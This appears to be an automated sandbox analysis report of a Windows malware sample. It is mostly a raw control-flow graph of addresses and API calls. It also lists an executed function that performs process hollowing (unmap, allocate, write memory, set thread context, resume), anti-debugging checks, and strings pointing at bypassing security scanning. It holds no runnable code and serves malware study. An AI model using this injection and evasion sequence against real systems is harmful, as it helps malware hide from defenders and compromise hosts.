31d89d0 20 API calls 36814->36815 36816 31e5c7b 36815->36816 36817 31c4860 11 API calls 36816->36817 36818 31e5c9c 36817->36818 36819 31c47ec 11 API calls 36818->36819 36820 31e5cd3 36819->36820 36821 31d89d0 20 API calls 36820->36821 36822 31e5cf7 36821->36822 36823 31c4860 11 API calls 36822->36823 36824 31e5d18 36823->36824 36825 31c47ec 11 API calls 36824->36825 36826 31e5d4f 36825->36826 36827 31d89d0 20 API calls 36826->36827 36829 31e5d73 36827->36829 36828 31e7568 36830 31c4860 11 API calls 36828->36830 36829->36828 36831 31c4860 11 API calls 36829->36831 36833 31e7589 36830->36833 36832 31e5da8 36831->36832 36834 31c7e5c GetFileAttributesA 36832->36834 36835 31c47ec 11 API calls 36833->36835 36836 31e5dcb 36834->36836 36839 31e75c0 36835->36839 36836->36828 36837 31e5dd3 36836->36837 36838 31c4860 11 API calls 36837->36838 36841 31e5df4 36838->36841 36840 31d89d0 20 API calls 36839->36840 36842 31e75e4 36840->36842 36844 31c47ec 11 API calls 36841->36844 36843 31c4860 11 API calls 36842->36843 36845 31e7605 36843->36845 36846 31e5e2b 36844->36846 36847 31c47ec 11 API calls 36845->36847 36848 31d89d0 20 API calls 36846->36848 36851 31e763c 36847->36851 36849 31e5e4f 36848->36849 36850 31c4860 11 API calls 36849->36850 36853 31e5e70 36850->36853 36852 31d89d0 20 API calls 36851->36852 36854 31e7660 36852->36854 36856 31c47ec 11 API calls 36853->36856 36855 31c4860 11 API calls 36854->36855 36857 31e7681 36855->36857 36858 31e5ea7 36856->36858 36859 31c47ec 11 API calls 36857->36859 36860 31d89d0 20 API calls 36858->36860 36863 31e76b8 36859->36863 36861 31e5ecb 36860->36861 36862 31c4860 11 API calls 36861->36862 36865 31e5eec 36862->36865 36864 31d89d0 20 API calls 36863->36864 36866 31e76dc 36864->36866 36868 31c47ec 11 API calls 36865->36868 36867 31c4860 11 API calls 36866->36867 36869 31e76fd 36867->36869 36870 31e5f23 36868->36870 36871 31c47ec 11 API calls 36869->36871 36872 31d89d0 20 API calls 36870->36872 36875 31e7734 36871->36875 36873 31e5f47 36872->36873 36874 31c4860 11 API calls 36873->36874 36877 31e5f68 36874->36877 36876 31d89d0 20 API calls 36875->36876 36878 31e7758 36876->36878 36880 31c4860 11 API calls 36877->36880 36879 31c4860 11 API calls 36878->36879 36881 31e7779 36879->36881 36882 31e5fa0 36880->36882 36883 31c47ec 11 API calls 36881->36883 36884 31c47ec 11 API calls 36882->36884 36885 31e77b0 36883->36885 36886 31e5fd7 36884->36886 36887 31d89d0 20 API calls 36885->36887 36888 31d89d0 20 API calls 36886->36888 36889 31e77d4 36887->36889 36890 31e5ffb 36888->36890 36892 31e8318 36889->36892 36893 31e77e9 36889->36893 36891 31c4860 11 API calls 36890->36891 36896 31e601c 36891->36896 36895 31c4860 11 API calls 36892->36895 36894 31c4860 11 API calls 36893->36894 36899 31e780a 36894->36899 36897 31e8339 36895->36897 36898 31c47ec 11 API calls 36896->36898 36901 31c47ec 11 API calls 36897->36901 36902 31e6053 36898->36902 36900 31c47ec 11 API calls 36899->36900 36904 31e7841 36900->36904 36905 31e8370 36901->36905 36903 31d89d0 20 API calls 36902->36903 36906 31e6077 36903->36906 36908 31d89d0 20 API calls 36904->36908 36909 31d89d0 20 API calls 36905->36909 36907 31c4860 11 API calls 36906->36907 36914 31e6098 36907->36914 36910 31e7865 36908->36910 36911 31e8394 36909->36911 36912 31c4860 11 API calls 36910->36912 36913 31c4860 11 API calls 36911->36913 36916 31e7886 36912->36916 36917 31e83b5 36913->36917 36915 31c47ec 11 API calls 36914->36915 36920 31e60cf 36915->36920 36919 31c47ec 11 API calls 36916->36919 36918 31c47ec 11 API calls 36917->36918 36923 31e83ec 36918->36923 36922 31e78bd 36919->36922 36921 31d89d0 20 API calls 36920->36921 36924 31e60f3 36921->36924 36926 31d89d0 20 API calls 36922->36926 36927 31d89d0 20 API calls 36923->36927 36925 31c4860 11 API calls 36924->36925 36932 31e6114 36925->36932 36928 31e78e1 36926->36928 36929 31e8410 36927->36929 36930 31c4860 11 API calls 36928->36930 36931 31c4860 11 API calls 36929->36931 36934 31e7902 36930->36934 36935 31e8431 36931->36935 36933 31c47ec 11 API calls 36932->36933 36938 31e614b 36933->36938 36936 31c47ec 11 API calls 36934->36936 36937 31c47ec 11 API calls 36935->36937 36939 31e7939 36936->36939 36940 31e8468 36937->36940 36941 31d89d0 20 API calls 36938->36941 36944 31d89d0 20 API calls 36939->36944 36945 31d89d0 20 API calls 36940->36945 36942 31e616f 36941->36942 36943 31c4860 11 API calls 36942->36943 36951 31e61a9 36943->36951 36946 31e795d 36944->36946 36947 31e848c 36945->36947 36948 31c47ec 11 API calls 36946->36948 36949 31c4860 11 API calls 36947->36949 36950 31e7975 36948->36950 36954 31e84ad 36949->36954 36953 31d85bc 18 API calls 36950->36953 36952 31c4860 11 API calls 36951->36952 36958 31e61e1 36952->36958 36955 31e7986 36953->36955 36957 31c47ec 11 API calls 36954->36957 36956 31c4860 11 API calls 36955->36956 36961 31e79a7 36956->36961 36959 31e84e4 36957->36959 36960 31c47ec 11 API calls 36958->36960 36963 31d89d0 20 API calls 36959->36963 36965 31e6218 36960->36965 36962 31c47ec 11 API calls 36961->36962 36967 31e79de 36962->36967 36964 31e8508 36963->36964 36968 31e851d 36964->36968 36969 31e93a1 36964->36969 36966 31d89d0 20 API calls 36965->36966 36970 31e623c 36966->36970 36974 31d89d0 20 API calls 36967->36974 36972 31c4860 11 API calls 36968->36972 36971 31c4860 11 API calls 36969->36971 36973 31c4860 11 API calls 36970->36973 36978 31e93c2 36971->36978 36975 31e853e 36972->36975 36980 31e625d 36973->36980 36976 31e7a02 36974->36976 36979 31e8556 36975->36979 36977 31c4860 11 API calls 36976->36977 36984 31e7a23 36977->36984 36981 31c47ec 11 API calls 36978->36981 36982 31c47ec 11 API calls 36979->36982 36983 31c47ec 11 API calls 36980->36983 36988 31e93f9 36981->36988 36985 31e8575 36982->36985 36989 31e6294 36983->36989 36986 31c47ec 11 API calls 36984->36986 36987 31e858d 36985->36987 36994 31e7a5a 36986->36994 36991 31d89d0 20 API calls 36987->36991 36990 31d89d0 20 API calls 36988->36990 36992 31d89d0 20 API calls 36989->36992 36993 31e941d 36990->36993 36995 31e8599 36991->36995 36996 31e62b8 36992->36996 36997 31c4860 11 API calls 36993->36997 37000 31d89d0 20 API calls 36994->37000 36998 31c4860 11 API calls 36995->36998 36999 31c4860 11 API calls 36996->36999 37004 31e943e 36997->37004 37001 31e85ba 36998->37001 37005 31e62d9 36999->37005 37002 31e7a7e 37000->37002 37006 31e85c5 37001->37006 37003 31c4860 11 API calls 37002->37003 37010 31e7a9f 37003->37010 37007 31c47ec 11 API calls 37004->37007 37009 31c47ec 11 API calls 37005->37009 37008 31c47ec 11 API calls 37006->37008 37013 31e9475 37007->37013 37011 31e85f1 37008->37011 37015 31e6310 37009->37015 37012 31c47ec 11 API calls 37010->37012 37014 31e85fc 37011->37014 37018 31e7ad6 37012->37018 37017 31d89d0 20 API calls 37013->37017 37016 31d89d0 20 API calls 37014->37016 37020 31d89d0 20 API calls 37015->37020 37019 31e8615 37016->37019 37021 31e9499 37017->37021 37026 31d89d0 20 API calls 37018->37026 37023 31c4860 11 API calls 37019->37023 37024 31e6334 37020->37024 37022 31c4860 11 API calls 37021->37022 37027 31e94ba 37022->37027 37028 31e8636 37023->37028 37025 31c4860 11 API calls 37024->37025 37029 31e6355 37025->37029 37030 31e7afa 37026->37030 37031 31c47ec 11 API calls 37027->37031 37032 31c47ec 11 API calls 37028->37032 37033 31c47ec 11 API calls 37029->37033 38347 31dadf8 29 API calls 37030->38347 37037 31e94f1 37031->37037 37038 31e866d 37032->37038 37039 31e638c 37033->37039 37035 31e7b21 37036 31c4860 11 API calls 37035->37036 37044 31e7b42 37036->37044 37041 31d89d0 20 API calls 37037->37041 37040 31d89d0 20 API calls 37038->37040 37043 31d89d0 20 API calls 37039->37043 37042 31e8691 37040->37042 37054 31e9515 37041->37054 37045 31c47ec 11 API calls 37042->37045 37046 31e63b0 37043->37046 37047 31c47ec 11 API calls 37044->37047 37048 31e86bd 37045->37048 37049 31c4860 11 API calls 37046->37049 37055 31e7b79 37047->37055 37052 31e86d5 37048->37052 37053 31e63d1 37049->37053 37050 31e9cf5 37051 31c4860 11 API calls 37050->37051 37058 31e9d16 37051->37058 37060 31e86e0 CreateProcessAsUserW 37052->37060 37057 31c47ec 11 API calls 37053->37057 37054->37050 37056 31c4860 11 API calls 37054->37056 37059 31d89d0 20 API calls 37055->37059 37068 31e9560 37056->37068 37070 31e6408 37057->37070 37064 31c47ec 11 API calls 37058->37064 37061 31e7b9d 37059->37061 37062 31e876e 37060->37062 37063 31e86f2 37060->37063 37065 31c4860 11 API calls 37061->37065 37066 31c4860 11 API calls 37062->37066 37067 31c4860 11 API calls 37063->37067 37074 31e9d4d 37064->37074 37075 31e7bbe 37065->37075 37076 31e878f 37066->37076 37069 31e8713 37067->37069 37071 31c47ec 11 API calls 37068->37071 37072 31e871e 37069->37072 37073 31d89d0 20 API calls 37070->37073 37085 31e9597 37071->37085 37078 31c47ec 11 API calls 37072->37078 37077 31e642c 37073->37077 37080 31d89d0 20 API calls 37074->37080 37081 31c47ec 11 API calls 37075->37081 37082 31c47ec 11 API calls 37076->37082 37079 31c4860 11 API calls 37077->37079 37084 31e874a 37078->37084 37089 31e644d 37079->37089 37083 31e9d71 37080->37083 37091 31e7bf5 37081->37091 37092 31e87c6 37082->37092 37086 31c4860 11 API calls 37083->37086 37088 31e8755 37084->37088 37087 31d89d0 20 API calls 37085->37087 37095 31e9d92 37086->37095 37090 31e95bb 37087->37090 37098 31d89d0 20 API calls 37088->37098 37094 31c47ec 11 API calls 37089->37094 37093 31c4860 11 API calls 37090->37093 37096 31d89d0 20 API calls 37091->37096 37097 31d89d0 20 API calls 37092->37097 37104 31e95dc 37093->37104 37105 31e6484 37094->37105 37101 31c47ec 11 API calls 37095->37101 37099 31e7c19 37096->37099 37100 31e87ea 37097->37100 37098->37062 37102 31c4860 11 API calls 37099->37102 37103 31c4860 11 API calls 37100->37103 37108 31e9dc9 37101->37108 37109 31e7c3a 37102->37109 37110 31e880b 37103->37110 37106 31c47ec 11 API calls 37104->37106 37107 31d89d0 20 API calls 37105->37107 37117 31e9613 37106->37117 37111 31e64a8 37107->37111 37113 31d89d0 20 API calls 37108->37113 37114 31c47ec 11 API calls 37109->37114 37115 31c47ec 11 API calls 37110->37115 37112 31c4860 11 API calls 37111->37112 37116 31e64d5 37112->37116 37118 31e9ded 37113->37118 37121 31e7c71 37114->37121 37907 31d85bc 37116->37907 37120 31d89d0 20 API calls 37117->37120 37119 31c4860 11 API calls 37118->37119 37128 31e9e0e 37119->37128 37124 31e9637 37120->37124 37129 31d89d0 20 API calls 37121->37129 37125 31c4860 11 API calls 37124->37125 37134 31e9658 37125->37134 37133 31c47ec 11 API calls 37128->37133 37131 31e7c95 37129->37131 37137 31c4860 11 API calls 37131->37137 37141 31e9e45 37133->37141 37139 31c47ec 11 API calls 37134->37139 37144 31e7cd5 37137->37144 37146 31e968f 37139->37146 37143 31d89d0 20 API calls 37141->37143 37149 31d89d0 20 API calls 37146->37149 37152 31e96b3 37149->37152 37156 31df094 11 API calls 37152->37156 37821 31c2eed 37820->37821 37822 31c2ef8 GetTickCount 37820->37822 37821->35443 37822->35443 37824 31df6fa GetProcAddress 37823->37824 37825 31df711 37823->37825 37826 31df709 37824->37826 37825->35513 37826->35513 37828 31df786 37827->37828 37829 31df760 GetProcAddress 37827->37829 37828->35514 37828->35518 37829->37828 37830 31df774 CheckRemoteDebuggerPresent 37829->37830 37830->37828 37837 31de114 37831->37837 37832 31de197 37833 31c44dc 11 API calls 37832->37833 37835 31de19f 37833->37835 37834 31c49f8 11 API calls 37834->37837 37836 31c4530 11 API calls 37835->37836 37838 31de1aa 37836->37838 37837->37832 37837->37834 37839 31c4500 11 API calls 37838->37839 37840 31de1c4 37839->37840 37840->35652 37842 31c49a0 37841->37842 37843 31c7e66 GetFileAttributesA 37842->37843 37844 31c7e71 37843->37844 37844->35674 37844->35675 37846 31c45cc 11 API calls 37845->37846 37847 31cc38b 37846->37847 37847->35733 37849 31c4de6 37848->37849 37849->37849 37851 31c7adc 37850->37851 37852 31c7afd 37851->37852 38353 31c7660 42 API calls 37851->38353 37854 31df16c 37852->37854 37855 31df189 37854->37855 37856 31df1e7 37855->37856 38354 31c46c4 11 API calls 37855->38354 38355 31c4530 11 API calls 37855->38355 37858 31c44dc 11 API calls 37856->37858 37859 31df1fc 37858->37859 37860 31c44dc 11 API calls 37859->37860 37862 31df204 37860->37862 37862->36218 37864 31c4530 11 API calls 37863->37864 37866 31df11c 37864->37866 37865 31df163 37865->36265 37866->37865 37867 31c49f8 11 API calls 37866->37867 37867->37866 37869 31de265 37868->37869 37870 31c4530 11 API calls 37869->37870 37871 31de291 37870->37871 38356 31c57d0 37871->38356 37873 31de2d1 37874 31c4530 11 API calls 37873->37874 37876 31de2e3 37874->37876 37875 31c4a00 11 API calls 37877 31de2b5 37875->37877 37879 31c4500 11 API calls 37876->37879 37877->37873 37877->37875 37877->37876 38359 31c4a40 11 API calls 37877->38359 37880 31de348 37879->37880 37881 31c5818 37880->37881 37882 31c581f 37881->37882 37884 31c5839 37882->37884 38382 31c57dc 13 API calls 37882->38382 37884->36331 37886 31c49a0 37885->37886 37887 31c7e8a GetFileAttributesA 37886->37887 37888 31c7e95 37887->37888 37888->36462 37888->36463 38383 31d5be8 37889->38383 37891 31d4dee 38387 31c7de0 WriteFile 37891->38387 37892 31d4e09 37892->36736 37897 31de3ba 37894->37897 37895 31de45c 37896 31c4bcc 11 API calls 37895->37896 37898 31de471 37896->37898 37897->37895 38420 31c46c4 11 API calls 37897->38420 38421 31c4530 11 API calls 37897->38421 37899 31c4530 11 API calls 37898->37899 37901 31de47c 37899->37901 37903 31c44dc 11 API calls 37901->37903 37904 31de491 37903->37904 37905 31c4500 11 API calls 37904->37905 37906 31de49e 37905->37906 37906->36682 37908 31c4530 11 API calls 37907->37908 37909 31d85df 37908->37909 37910 31c4860 11 API calls 37909->37910 37911 31d85fe 37910->37911 38321 31c4f20 SysAllocStringLen 38320->38321 38322 31ddd85 38321->38322 38323 31c44dc 11 API calls 38322->38323 38324 31ddd9a 38323->38324 38325 31dddaa RtlDosPathNameToNtPathName_U 38324->38325 38467 31ddbdc 38325->38467 38327 31dddc6 NtOpenFile NtQueryInformationFile 38328 31c4bcc 11 API calls 38327->38328 38329 31dde01 38328->38329 38330 31c49f8 11 API calls 38329->38330 38331 31dde0d NtReadFile NtClose 38330->38331 38332 31dde37 38331->38332 38333 31c4c60 SysFreeString 38332->38333 38334 31dde3f 38333->38334 38334->35874 38336 31de1e6 38335->38336 38468 31c8d94 38336->38468 38339 31c44dc 11 API calls 38340 31de239 38339->38340 38340->35990 38340->35991 38342 31c4d7a 38341->38342 38343->36462 38344->36701 38347->37035 38353->37852 38354->37855 38355->37855 38360 31c5644 38356->38360 38359->37877 38361 31c5663 38360->38361 38366 31c567d 38360->38366 38362 31c566e 38361->38362 38377 31c2cf4 11 API calls 38361->38377 38378 31c563c 13 API calls 38362->38378 38365 31c5678 38365->37877 38367 31c56c6 38366->38367 38379 31c2cf4 11 API calls 38366->38379 38369 31c56d3 38367->38369 38370 31c5708 38367->38370 38380 31c2c44 11 API calls 38369->38380 38372 31c2c10 11 API calls 38370->38372 38374 31c5712 38372->38374 38373 31c5703 38373->38365 38376 31c5644 16 API calls 38373->38376 38374->38373 38381 31c5624 16 API calls 38374->38381 38376->38373 38377->38362 38378->38365 38379->38367 38380->38373 38381->38373 38382->37884 38384 31d5bf1 38383->38384 38389 31d5c2c 38384->38389 38386 31d5c0d 38386->37891 38388 31c7dfd 38387->38388 38388->37892 38390 31d5c47 38389->38390 38391 31d5cec 38390->38391 38392 31d5c6e 38390->38392 38416 31c7d5c CreateFileA 38391->38416 38394 31d5c87 CreateFileA 38392->38394 38396 31d5c98 38394->38396 38395 31d5cf6 38412 31d5ce5 38395->38412 38417 31c7f98 12 API calls 38395->38417 38396->38412 38413 31c7f98 12 API calls 38396->38413 38399 31c4530 11 API calls 38402 31d5d59 38399->38402 38400 31d5d11 GetLastError 38418 31ca778 12 API calls 38400->38418 38401 31d5cac GetLastError 38414 31ca778 12 API calls 38401->38414 38405 31c4500 11 API calls 38402->38405 38408 31d5d73 38405->38408 38406 31d5d28 38419 31cb084 42 API calls 38406->38419 38407 31d5cc3 38415 31cb084 42 API calls 38407->38415 38408->38386 38411 31d5d4a 38411->38412 38412->38399 38413->38401 38414->38407 38415->38412 38416->38395 38417->38400 38418->38406 38419->38411 38420->37897 38421->37897 38467->38327 38469 31c8da1 38468->38469 38470 31c8dc7 38469->38470 38472 31c7660 42 API calls 38469->38472 38470->38339 38472->38470

                                                                                              Executed Functions

                                                                                              Function 031D8D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 6027 31d8d70-31d8d73 6028 31d8d78-31d8d7d 6027->6028 6028->6028 6029 31d8d7f-31d8e66 call 31c4990 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6028->6029 6060 31d8e6c-31d8f47 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6029->6060 6061 31da8b7-31da921 call 31c4500 * 2 call 31c4c60 call 31c4500 call 31c44dc call 31c4500 * 2 6029->6061 6060->6061 6105 31d8f4d-31d9275 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c30d4 * 2 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4de0 call 31c4df0 call 31d8788 6060->6105 6214 31d92e8-31d9609 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c2ee0 call 31c2f08 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 GetThreadContext 6105->6214 6215 31d9277-31d92e3 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6105->6215 6214->6061 6323 31d960f-31d9872 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d8400 6214->6323 6215->6214 6396 31d9b7f-31d9beb call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6323->6396 6397 31d9878-31d99e1 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d8670 6323->6397 6424 31d9bf0-31d9d70 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d7a2c 6396->6424 6487 31d9a0b-31d9a77 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6397->6487 6488 31d99e3-31d9a09 call 31d7a2c 6397->6488 6424->6061 6528 31d9d76-31d9e6f call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d8c80 6424->6528 6495 31d9a7c-31d9b73 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d7a2c 6487->6495 6488->6495 6567 31d9b78-31d9b7d 6495->6567 6579 31d9e71-31d9ebe call 31d8b78 call 31d8b6c 6528->6579 6580 31d9ec3-31da61b call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d7d78 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d7d78 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 SetThreadContext NtResumeThread call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c2c2c call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31d894c * 3 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 6528->6580 6567->6424 6579->6580 6805 31da620-31da8b2 call 31d894c * 2 call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c * 5 call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31d8080 call 31d894c * 2 6580->6805 6805->6061
                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031D8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031D8814
                                                                                              • GetThreadContext.KERNEL32(0000089C,03247424,ScanString,032473A8,031DA93C,UacInitialize,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,UacInitialize,032473A8), ref: 031D9602
                                                                                                • Part of subcall function 031D8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D8471
                                                                                                • Part of subcall function 031D8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 031D86D5
                                                                                                • Part of subcall function 031D7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031D7A9F
                                                                                                • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                              • SetThreadContext.KERNEL32(0000089C,03247424,ScanBuffer,032473A8,031DA93C,ScanString,032473A8,031DA93C,Initialize,032473A8,031DA93C,000008A0,003AEFF8,032474FC,00000004,03247500), ref: 031DA317
                                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(0000089C,00000000,0000089C,03247424,ScanBuffer,032473A8,031DA93C,ScanString,032473A8,031DA93C,Initialize,032473A8,031DA93C,000008A0,003AEFF8,032474FC), ref: 031DA324
                                                                                                • Part of subcall function 031D894C: LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                                • Part of subcall function 031D894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                                • Part of subcall function 031D894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                              • API String ID: 2388221946-51457883
                                                                                              • Opcode ID: 4f57798019dfd46501e0f8c38d7a4077720e8368b3f56d8aeff0f294727c8965
                                                                                              • Instruction ID: f29cacbe1708d1324b85b206affedfccaf861d2672cf724fa47736ebc37bdcbf
                                                                                              • Opcode Fuzzy Hash: 4f57798019dfd46501e0f8c38d7a4077720e8368b3f56d8aeff0f294727c8965
                                                                                              • Instruction Fuzzy Hash: 95E21C38A142689FCB16FB65DC91BCEB3B9AF9D200F1041A5A055AF215DF30EE86CF51
                                                                                              Function 031D8D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
